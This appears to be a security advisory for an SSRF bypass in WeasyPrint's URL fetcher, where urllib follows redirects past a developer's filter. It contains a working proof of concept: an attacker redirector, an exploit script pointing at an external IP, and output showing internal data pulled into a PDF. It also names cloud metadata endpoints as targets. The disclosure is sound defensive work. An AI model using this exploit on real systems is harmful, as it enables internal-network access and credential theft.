+ "details": "### Summary\n\nA **Server-Side Request Forgery (SSRF) Protection Bypass** exists in WeasyPrint's `default_url_fetcher`. The vulnerability allows attackers to access internal network resources (such as `localhost` services or cloud metadata endpoints) even when a developer has implemented a custom `url_fetcher` to block such access. This occurs because the underlying `urllib` library follows HTTP redirects automatically without re-validating the new destination against the developer's security policy.\n\n### Details\n\nThe default URL fetching mechanism in WeasyPrint (default_url_fetcher in weasyprint/urls.py) is vulnerable to a Server-Side Request Forgery (SSRF) Protection Bypass.\n\nWhile WeasyPrint allows developers to define custom url_fetcher functions to validate or sanitize URLs before fetching (e.g., blocking internal IP addresses or specific ports), the underlying implementation uses Python's standard urllib.request.urlopen. By default, urllib automatically follows HTTP redirects (status codes 301, 302, 307, etc.) without returning control to the developer's validation logic for the new target URL.\n\nThis behavior creates a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. An attacker can provide a URL that passes the developer's allowlist/blocklist (the Check) but immediately redirects to a blocked internal resource (the Use).\n\n### PoC\n\nTo reproduce this vulnerability, use the following setup. This scenario simulates a developer attempting to blacklist access to internal hostnames (e.g., `localhost`).\n\n**1. victim.py (Internal Service - Port 5000)**\nSimulates a sensitive internal service running on localhost.\n\n```python\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route('/secret')\ndef secret():\n return \"CRITICAL_INTERNAL_DATA\"\n\nif __name__ == '__main__':\n # Listens on localhost:5000\n app.run(port=5000)\n```\n\n**2. attacker.py (External Redirector - Port 1337)**\nSimulates an external server. It accepts a request and redirects it to the blocked hostname (`localhost`).\n\n```python\nfrom flask import Flask, redirect\napp = Flask(__name__)\n\n@app.route('/image.png')\ndef malicious():\n # The vulnerability: Redirects to the BLOCKED hostname\n return redirect(\"http://localhost:5000/secret\", code=302)\n\nif __name__ == '__main__':\n app.run(port=1337)\n```\n\n**3. exploit.py (Vulnerable Implementation)**\nSimulates the application with a security filter intended to block access to \"localhost\".\n\n```python\nfrom weasyprint import HTML, default_url_fetcher\nimport logging\n\n# Security Filter: Intended to block internal hostnames\ndef secure_fetcher(url):\n # Simulates a blacklist for 'localhost'\n if \"localhost\" in url:\n raise PermissionError(f\"Security Block: Access to {url} denied.\")\n \n print(f\"[ALLOWED] Initial URL check passed for: {url}\")\n return default_url_fetcher(url)\n\n# EXPLOIT LOGIC:\n# 1. We access the attacker via '127.0.0.1' (or an external IP). \n# The string \"127.0.0.1\" passes the check because it is not \"localhost\".\n# 2. The attacker redirects to \"http://localhost:5000/...\".\n# 3. urllib follows the redirect to 'localhost' without re-triggering secure_fetcher.\n\ntry:\n # Use 127.0.0.1 to bypass the string check for 'localhost'\n html_content = '<link rel=\"attachment\" href=\"http://54.234.88.160:1337/image.png\">'\n \n doc = HTML(string=html_content, url_fetcher=secure_fetcher)\n doc.write_pdf(\"exploit.pdf\")\n \n print(\"Exploit successful. The 'localhost' block was bypassed via redirect.\")\n print(\"Check exploit.pdf for 'CRITICAL_INTERNAL_DATA'.\")\nexcept Exception as e:\n print(f\"Exploit failed: {e}\")\n```\n**4. Attacker read attachment in PDF**\n```\n➜ pdfdetach -list resultado_exploit.pdf\n1 embedded files\n1: secret\n➜ pdfdetach -saveall resultado_exploit.pdf\n➜ cat secret\nCRITICAL_INTERNAL_DATA\n```\n**Evidence**\n<img width=\"1514\" height=\"436\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f7881694-be4d-4c63-8bca-2b220e4c87f9\" />\n\n### Impact\n\nThis vulnerability impacts any application or SaaS platform using WeasyPrint to render user-supplied HTML/CSS that attempts to restrict external resource loading.\n\n * **Internal Network Reconnaissance:** Attackers can bypass firewalls or allowlists to scan and access internal services (e.g., Redis, ElasticSearch, Admin Panels) running on the loopback interface or local network.\n * **Cloud Metadata Exfiltration:** In cloud environments, attackers can redirect requests to metadata services (e.g., `http://169.254.169.254`) to steal instance credentials and escalate privileges.\n * **Security Control Bypass:** It renders the `url_fetcher` security validation logic ineffective against sophisticated attacks, creating a false sense of security for developers.",
0 commit comments